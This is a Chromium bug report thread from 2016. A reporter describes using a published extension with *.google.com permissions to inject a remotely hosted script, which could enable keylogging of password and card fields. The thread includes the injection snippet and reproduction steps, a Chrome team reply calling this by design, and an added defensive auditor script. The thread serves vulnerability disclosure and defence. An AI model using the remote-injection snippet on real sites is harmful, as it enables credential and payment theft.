Security: Able to execute an ajax keylogger on *.google.com for 1500+ persons
Reported by
thomasbe...@gmail.com,
Sep 8 2016
Issue description

I created a Google extension used by 1500 persons and gave it the google.com authorisations. It also includes a JavaScript file in the page, programmatically loaded on my own server.

Now I'm able to execute JavaScript on any page *.google.com, including an ajax keylogger on password and credit card fields, mouse tracking, redirects, data displayed...

Steps to reproduce:
1. Create extension with javascript file and *google.com
2. insert a <script src="domain.com/javascript.js"> in the html/head
3. insert some malicious script in the remote js file and it will be executed.

Browser/OS: Google Chrome Windows

I tried by including a Google Analytics code, but I could have used an onkeypress event and many more.

The extension: https://chrome.google.com/webstore/detail/jakmkngjpkpcjkekgoaenfhanfkfglhp

The URL of the script I can introduce in *.google.* webpages: https://pom.pm/ginteg/ginteg.js

The code for inserting script in page:

    window.onload = function(){
        // Find the page's <head> and create a new <script> element
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        // Point it at the remotely hosted file, then attach it so the page runs it
        script.src = "//pom.pm/ginteg/ginteg.js";
        head.appendChild(script);
    }
,
Sep 8 2016
Thanks for your report. This is certainly by design that an extension that requests access to a particular site (or all sites) can perform arbitrary changes to the websites including, but not limited to, injecting scripts into any of those origins.

Chrome deals with these potential issues by having a multi-pronged strategy of anti-abuse and detection to protect our users.

1. There is a robust set of policies that developers agree to before publishing extensions to the webstore: https://developer.chrome.com/webstore/program_policies
In particular, the extension should describe what it does and it should have a "single purpose" as described here: https://developer.chrome.com/extensions/single_purpose
It appears that if this extension had an embedded keylogger then it would violate the policies here, as e.g. it describes its use as "Google windows 10 integration (Cortana)" and not keylogging.

2. Chrome warns the user when installing the extension about the permissions that it requires, and users should be wary of extensions that request more permissions than are required.

3. Google has systems and teams that automatically monitor and detect extension abuse.
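Added example, not part of the original thread and not Chrome's or the Web Store's own tooling: a static check a reviewer could run over an unpacked extension to flag the combination this report describes, host access to a sensitive origin together with a script element loaded from a remote URL. The manifest, the `inject.js` contents, the `remote.example` host and all function names are constructed or hypothetical.

```javascript
// Added example: static review of an unpacked extension for the pattern in this report.
// All inputs below are constructed samples; function names are hypothetical.

// True if a Chrome match pattern (or <all_urls>) grants access to `host`.
function patternCoversHost(pattern, host) {
  if (pattern === '<all_urls>') return true;
  const m = /^(\*|https?|wss?|ftp|file):\/\/([^/]*)\//.exec(pattern);
  if (!m) return false; // API permissions such as "storage" are not host patterns
  const h = m[2];
  if (h === '*') return true;
  if (h.startsWith('*.')) return host === h.slice(2) || host.endsWith(h.slice(1));
  return h === host;
}

// Heuristic: the file builds a <script> element and assigns it a remote (non-packaged) URL.
function findRemoteScriptLoads(source) {
  if (!/createElement\(\s*['"]script['"]\s*\)/.test(source)) return [];
  const re = /\.src\s*=\s*['"]((?:https?:)?\/\/[^'"]+)['"]/g;
  return [...source.matchAll(re)].map(m => m[1]);
}

// Combine both signals: host access to a sensitive origin plus remotely loaded code.
function auditExtension(manifest, scripts, sensitiveHost) {
  const patterns = [
    ...(manifest.permissions || []),        // MV2 mixes host patterns into "permissions"
    ...(manifest.host_permissions || []),   // MV3
    ...(manifest.content_scripts || []).flatMap(cs => cs.matches || []),
  ];
  const hostAccess = [...new Set(patterns)].filter(p => patternCoversHost(p, sensitiveHost));
  const remoteLoads = Object.entries(scripts).flatMap(([file, src]) =>
    findRemoteScriptLoads(src).map(url => ({ file, url })));
  return { hostAccess, remoteLoads, flagged: hostAccess.length > 0 && remoteLoads.length > 0 };
}

// Constructed sample modelled on the report; remote.example is a placeholder host.
const sampleManifest = {
  manifest_version: 2,
  permissions: ['storage', '*://*.google.com/*'],
  content_scripts: [{ matches: ['*://*.google.com/*'], js: ['inject.js'] }],
};
const sampleScripts = {
  'inject.js': `window.onload = function () {
    var script = document.createElement('script');
    script.src = "//remote.example/payload.js";
    document.getElementsByTagName('head')[0].appendChild(script);
  };`,
};

console.log(JSON.stringify(auditExtension(sampleManifest, sampleScripts, 'accounts.google.com'), null, 2));
```

The regex check is a heuristic: it misses URLs assembled at runtime, so a clean result does not prove the extension loads no remote code.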
,
Sep 8 2016
,
Sep 16 2016
Haven't heard back from the developer. Closing wontfix. b/31367085
Comment 1 by thomasbe...@gmail.com, Sep 8 2016
Attachment: 49.1 KB